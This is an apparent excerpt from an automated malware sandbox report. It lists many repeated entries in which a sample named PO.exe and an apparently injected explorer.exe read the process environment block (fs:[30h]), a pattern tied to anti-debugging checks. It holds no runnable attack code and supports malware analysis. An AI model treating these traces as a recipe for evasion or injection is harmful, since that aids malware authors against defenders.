Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AF1608 mov eax, dword ptr fs:[00000030h]	1_2_00AF1608
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A6A61C mov eax, dword ptr fs:[00000030h]	1_2_00A6A61C
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A6A61C mov eax, dword ptr fs:[00000030h]	1_2_00A6A61C
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A4766D mov eax, dword ptr fs:[00000030h]	1_2_00A4766D
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A5AE73 mov eax, dword ptr fs:[00000030h]	1_2_00A5AE73
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A5AE73 mov eax, dword ptr fs:[00000030h]	1_2_00A5AE73
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A5AE73 mov eax, dword ptr fs:[00000030h]	1_2_00A5AE73
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A5AE73 mov eax, dword ptr fs:[00000030h]	1_2_00A5AE73
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A5AE73 mov eax, dword ptr fs:[00000030h]	1_2_00A5AE73
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A47E41 mov eax, dword ptr fs:[00000030h]	1_2_00A47E41
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A47E41 mov eax, dword ptr fs:[00000030h]	1_2_00A47E41
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A47E41 mov eax, dword ptr fs:[00000030h]	1_2_00A47E41
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A47E41 mov eax, dword ptr fs:[00000030h]	1_2_00A47E41
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A47E41 mov eax, dword ptr fs:[00000030h]	1_2_00A47E41
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A47E41 mov eax, dword ptr fs:[00000030h]	1_2_00A47E41
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AFAE44 mov eax, dword ptr fs:[00000030h]	1_2_00AFAE44
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AFAE44 mov eax, dword ptr fs:[00000030h]	1_2_00AFAE44
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A48794 mov eax, dword ptr fs:[00000030h]	1_2_00A48794
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB7794 mov eax, dword ptr fs:[00000030h]	1_2_00AB7794
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB7794 mov eax, dword ptr fs:[00000030h]	1_2_00AB7794
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB7794 mov eax, dword ptr fs:[00000030h]	1_2_00AB7794
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A737F5 mov eax, dword ptr fs:[00000030h]	1_2_00A737F5
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A34F2E mov eax, dword ptr fs:[00000030h]	1_2_00A34F2E
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A34F2E mov eax, dword ptr fs:[00000030h]	1_2_00A34F2E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D78CD6 mov eax, dword ptr fs:[00000030h]	10_2_04D78CD6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D3B8D0 mov eax, dword ptr fs:[00000030h]	10_2_04D3B8D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D3B8D0 mov ecx, dword ptr fs:[00000030h]	10_2_04D3B8D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D3B8D0 mov eax, dword ptr fs:[00000030h]	10_2_04D3B8D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D3B8D0 mov eax, dword ptr fs:[00000030h]	10_2_04D3B8D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D3B8D0 mov eax, dword ptr fs:[00000030h]	10_2_04D3B8D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D3B8D0 mov eax, dword ptr fs:[00000030h]	10_2_04D3B8D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D26CF0 mov eax, dword ptr fs:[00000030h]	10_2_04D26CF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D26CF0 mov eax, dword ptr fs:[00000030h]	10_2_04D26CF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D26CF0 mov eax, dword ptr fs:[00000030h]	10_2_04D26CF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CA58EC mov eax, dword ptr fs:[00000030h]	10_2_04CA58EC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D614FB mov eax, dword ptr fs:[00000030h]	10_2_04D614FB
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CA9080 mov eax, dword ptr fs:[00000030h]	10_2_04CA9080
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB849B mov eax, dword ptr fs:[00000030h]	10_2_04CB849B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D23884 mov eax, dword ptr fs:[00000030h]	10_2_04D23884
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D23884 mov eax, dword ptr fs:[00000030h]	10_2_04D23884
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE90AF mov eax, dword ptr fs:[00000030h]	10_2_04CE90AF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD20A0 mov eax, dword ptr fs:[00000030h]	10_2_04CD20A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD20A0 mov eax, dword ptr fs:[00000030h]	10_2_04CD20A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD20A0 mov eax, dword ptr fs:[00000030h]	10_2_04CD20A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD20A0 mov eax, dword ptr fs:[00000030h]	10_2_04CD20A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD20A0 mov eax, dword ptr fs:[00000030h]	10_2_04CD20A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD20A0 mov eax, dword ptr fs:[00000030h]	10_2_04CD20A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CDF0BF mov ecx, dword ptr fs:[00000030h]	10_2_04CDF0BF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CDF0BF mov eax, dword ptr fs:[00000030h]	10_2_04CDF0BF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CDF0BF mov eax, dword ptr fs:[00000030h]	10_2_04CDF0BF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D3C450 mov eax, dword ptr fs:[00000030h]	10_2_04D3C450
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D3C450 mov eax, dword ptr fs:[00000030h]	10_2_04D3C450
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CDA44B mov eax, dword ptr fs:[00000030h]	10_2_04CDA44B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CC0050 mov eax, dword ptr fs:[00000030h]	10_2_04CC0050
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CC0050 mov eax, dword ptr fs:[00000030h]	10_2_04CC0050
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CC746D mov eax, dword ptr fs:[00000030h]	10_2_04CC746D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D71074 mov eax, dword ptr fs:[00000030h]	10_2_04D71074
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D62073 mov eax, dword ptr fs:[00000030h]	10_2_04D62073
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D74015 mov eax, dword ptr fs:[00000030h]	10_2_04D74015
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D74015 mov eax, dword ptr fs:[00000030h]	10_2_04D74015
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D27016 mov eax, dword ptr fs:[00000030h]	10_2_04D27016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D27016 mov eax, dword ptr fs:[00000030h]	10_2_04D27016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D27016 mov eax, dword ptr fs:[00000030h]	10_2_04D27016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]	10_2_04D61C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]	10_2_04D61C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]	10_2_04D61C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]	10_2_04D61C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]	10_2_04D61C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]	10_2_04D61C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]	10_2_04D61C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]	10_2_04D61C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]	10_2_04D61C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]	10_2_04D61C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]	10_2_04D61C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]	10_2_04D61C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]	10_2_04D61C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D61C06 mov eax, dword ptr fs:[00000030h]	10_2_04D61C06
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D26C0A mov eax, dword ptr fs:[00000030h]	10_2_04D26C0A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D26C0A mov eax, dword ptr fs:[00000030h]	10_2_04D26C0A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D26C0A mov eax, dword ptr fs:[00000030h]	10_2_04D26C0A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D26C0A mov eax, dword ptr fs:[00000030h]	10_2_04D26C0A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D7740D mov eax, dword ptr fs:[00000030h]	10_2_04D7740D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D7740D mov eax, dword ptr fs:[00000030h]	10_2_04D7740D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D7740D mov eax, dword ptr fs:[00000030h]	10_2_04D7740D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD002D mov eax, dword ptr fs:[00000030h]	10_2_04CD002D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD002D mov eax, dword ptr fs:[00000030h]	10_2_04CD002D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD002D mov eax, dword ptr fs:[00000030h]	10_2_04CD002D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD002D mov eax, dword ptr fs:[00000030h]	10_2_04CD002D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD002D mov eax, dword ptr fs:[00000030h]	10_2_04CD002D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CBB02A mov eax, dword ptr fs:[00000030h]	10_2_04CBB02A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CBB02A mov eax, dword ptr fs:[00000030h]	10_2_04CBB02A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CBB02A mov eax, dword ptr fs:[00000030h]	10_2_04CBB02A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CBB02A mov eax, dword ptr fs:[00000030h]	10_2_04CBB02A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CDBC2C mov eax, dword ptr fs:[00000030h]	10_2_04CDBC2C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D26DC9 mov eax, dword ptr fs:[00000030h]	10_2_04D26DC9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D26DC9 mov eax, dword ptr fs:[00000030h]	10_2_04D26DC9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D26DC9 mov eax, dword ptr fs:[00000030h]	10_2_04D26DC9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D26DC9 mov ecx, dword ptr fs:[00000030h]	10_2_04D26DC9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D26DC9 mov eax, dword ptr fs:[00000030h]	10_2_04D26DC9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D26DC9 mov eax, dword ptr fs:[00000030h]	10_2_04D26DC9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D58DF1 mov eax, dword ptr fs:[00000030h]	10_2_04D58DF1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CAB1E1 mov eax, dword ptr fs:[00000030h]	10_2_04CAB1E1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CAB1E1 mov eax, dword ptr fs:[00000030h]	10_2_04CAB1E1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CAB1E1 mov eax, dword ptr fs:[00000030h]	10_2_04CAB1E1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CBD5E0 mov eax, dword ptr fs:[00000030h]	10_2_04CBD5E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CBD5E0 mov eax, dword ptr fs:[00000030h]	10_2_04CBD5E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D341E8 mov eax, dword ptr fs:[00000030h]	10_2_04D341E8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CA2D8A mov eax, dword ptr fs:[00000030h]	10_2_04CA2D8A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CA2D8A mov eax, dword ptr fs:[00000030h]	10_2_04CA2D8A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CA2D8A mov eax, dword ptr fs:[00000030h]	10_2_04CA2D8A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CA2D8A mov eax, dword ptr fs:[00000030h]	10_2_04CA2D8A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CA2D8A mov eax, dword ptr fs:[00000030h]	10_2_04CA2D8A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CDA185 mov eax, dword ptr fs:[00000030h]	10_2_04CDA185
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD2581 mov eax, dword ptr fs:[00000030h]	10_2_04CD2581
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD2581 mov eax, dword ptr fs:[00000030h]	10_2_04CD2581
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD2581 mov eax, dword ptr fs:[00000030h]	10_2_04CD2581
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD2581 mov eax, dword ptr fs:[00000030h]	10_2_04CD2581
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CCC182 mov eax, dword ptr fs:[00000030h]	10_2_04CCC182
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CDFD9B mov eax, dword ptr fs:[00000030h]	10_2_04CDFD9B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CDFD9B mov eax, dword ptr fs:[00000030h]	10_2_04CDFD9B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD2990 mov eax, dword ptr fs:[00000030h]	10_2_04CD2990
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD35A1 mov eax, dword ptr fs:[00000030h]	10_2_04CD35A1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D251BE mov eax, dword ptr fs:[00000030h]	10_2_04D251BE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D251BE mov eax, dword ptr fs:[00000030h]	10_2_04D251BE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D251BE mov eax, dword ptr fs:[00000030h]	10_2_04D251BE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D251BE mov eax, dword ptr fs:[00000030h]	10_2_04D251BE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD61A0 mov eax, dword ptr fs:[00000030h]	10_2_04CD61A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD61A0 mov eax, dword ptr fs:[00000030h]	10_2_04CD61A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D269A6 mov eax, dword ptr fs:[00000030h]	10_2_04D269A6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD1DB5 mov eax, dword ptr fs:[00000030h]	10_2_04CD1DB5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD1DB5 mov eax, dword ptr fs:[00000030h]	10_2_04CD1DB5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD1DB5 mov eax, dword ptr fs:[00000030h]	10_2_04CD1DB5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D705AC mov eax, dword ptr fs:[00000030h]	10_2_04D705AC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D705AC mov eax, dword ptr fs:[00000030h]	10_2_04D705AC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CCB944 mov eax, dword ptr fs:[00000030h]	10_2_04CCB944
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CCB944 mov eax, dword ptr fs:[00000030h]	10_2_04CCB944
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE3D43 mov eax, dword ptr fs:[00000030h]	10_2_04CE3D43
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D23540 mov eax, dword ptr fs:[00000030h]	10_2_04D23540
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CC7D50 mov eax, dword ptr fs:[00000030h]	10_2_04CC7D50
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CAC962 mov eax, dword ptr fs:[00000030h]	10_2_04CAC962
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CAB171 mov eax, dword ptr fs:[00000030h]	10_2_04CAB171
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CAB171 mov eax, dword ptr fs:[00000030h]	10_2_04CAB171
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CCC577 mov eax, dword ptr fs:[00000030h]	10_2_04CCC577
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CCC577 mov eax, dword ptr fs:[00000030h]	10_2_04CCC577
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CA9100 mov eax, dword ptr fs:[00000030h]	10_2_04CA9100
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CA9100 mov eax, dword ptr fs:[00000030h]	10_2_04CA9100
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CA9100 mov eax, dword ptr fs:[00000030h]	10_2_04CA9100
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D78D34 mov eax, dword ptr fs:[00000030h]	10_2_04D78D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D2A537 mov eax, dword ptr fs:[00000030h]	10_2_04D2A537
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CC4120 mov eax, dword ptr fs:[00000030h]	10_2_04CC4120
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CC4120 mov eax, dword ptr fs:[00000030h]	10_2_04CC4120
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CC4120 mov eax, dword ptr fs:[00000030h]	10_2_04CC4120
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CC4120 mov eax, dword ptr fs:[00000030h]	10_2_04CC4120
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CC4120 mov ecx, dword ptr fs:[00000030h]	10_2_04CC4120
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD4D3B mov eax, dword ptr fs:[00000030h]	10_2_04CD4D3B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD4D3B mov eax, dword ptr fs:[00000030h]	10_2_04CD4D3B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD4D3B mov eax, dword ptr fs:[00000030h]	10_2_04CD4D3B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD513A mov eax, dword ptr fs:[00000030h]	10_2_04CD513A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD513A mov eax, dword ptr fs:[00000030h]	10_2_04CD513A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CAAD30 mov eax, dword ptr fs:[00000030h]	10_2_04CAAD30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]	10_2_04CB3D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]	10_2_04CB3D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]	10_2_04CB3D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]	10_2_04CB3D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]	10_2_04CB3D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]	10_2_04CB3D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]	10_2_04CB3D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]	10_2_04CB3D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]	10_2_04CB3D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]	10_2_04CB3D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]	10_2_04CB3D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]	10_2_04CB3D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB3D34 mov eax, dword ptr fs:[00000030h]	10_2_04CB3D34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D78ED6 mov eax, dword ptr fs:[00000030h]	10_2_04D78ED6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD36CC mov eax, dword ptr fs:[00000030h]	10_2_04CD36CC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD2ACB mov eax, dword ptr fs:[00000030h]	10_2_04CD2ACB
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE8EC7 mov eax, dword ptr fs:[00000030h]	10_2_04CE8EC7
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D5FEC0 mov eax, dword ptr fs:[00000030h]	10_2_04D5FEC0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB76E2 mov eax, dword ptr fs:[00000030h]	10_2_04CB76E2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD2AE4 mov eax, dword ptr fs:[00000030h]	10_2_04CD2AE4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD16E0 mov ecx, dword ptr fs:[00000030h]	10_2_04CD16E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D3FE87 mov eax, dword ptr fs:[00000030h]	10_2_04D3FE87
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CDD294 mov eax, dword ptr fs:[00000030h]	10_2_04CDD294
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CDD294 mov eax, dword ptr fs:[00000030h]	10_2_04CDD294
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CA52A5 mov eax, dword ptr fs:[00000030h]	10_2_04CA52A5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CA52A5 mov eax, dword ptr fs:[00000030h]	10_2_04CA52A5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CA52A5 mov eax, dword ptr fs:[00000030h]	10_2_04CA52A5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CA52A5 mov eax, dword ptr fs:[00000030h]	10_2_04CA52A5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CA52A5 mov eax, dword ptr fs:[00000030h]	10_2_04CA52A5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D70EA5 mov eax, dword ptr fs:[00000030h]	10_2_04D70EA5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D70EA5 mov eax, dword ptr fs:[00000030h]	10_2_04D70EA5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D70EA5 mov eax, dword ptr fs:[00000030h]	10_2_04D70EA5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D246A7 mov eax, dword ptr fs:[00000030h]	10_2_04D246A7
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CBAAB0 mov eax, dword ptr fs:[00000030h]	10_2_04CBAAB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CBAAB0 mov eax, dword ptr fs:[00000030h]	10_2_04CBAAB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CDFAB0 mov eax, dword ptr fs:[00000030h]	10_2_04CDFAB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D34257 mov eax, dword ptr fs:[00000030h]	10_2_04D34257
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CA9240 mov eax, dword ptr fs:[00000030h]	10_2_04CA9240
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CA9240 mov eax, dword ptr fs:[00000030h]	10_2_04CA9240
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CA9240 mov eax, dword ptr fs:[00000030h]	10_2_04CA9240
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CA9240 mov eax, dword ptr fs:[00000030h]	10_2_04CA9240
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB7E41 mov eax, dword ptr fs:[00000030h]	10_2_04CB7E41
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB7E41 mov eax, dword ptr fs:[00000030h]	10_2_04CB7E41
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB7E41 mov eax, dword ptr fs:[00000030h]	10_2_04CB7E41
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB7E41 mov eax, dword ptr fs:[00000030h]	10_2_04CB7E41
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB7E41 mov eax, dword ptr fs:[00000030h]	10_2_04CB7E41
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB7E41 mov eax, dword ptr fs:[00000030h]	10_2_04CB7E41
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB766D mov eax, dword ptr fs:[00000030h]	10_2_04CB766D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CE927A mov eax, dword ptr fs:[00000030h]	10_2_04CE927A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D5B260 mov eax, dword ptr fs:[00000030h]	10_2_04D5B260
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D5B260 mov eax, dword ptr fs:[00000030h]	10_2_04D5B260
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D78A62 mov eax, dword ptr fs:[00000030h]	10_2_04D78A62
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CCAE73 mov eax, dword ptr fs:[00000030h]	10_2_04CCAE73
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CCAE73 mov eax, dword ptr fs:[00000030h]	10_2_04CCAE73
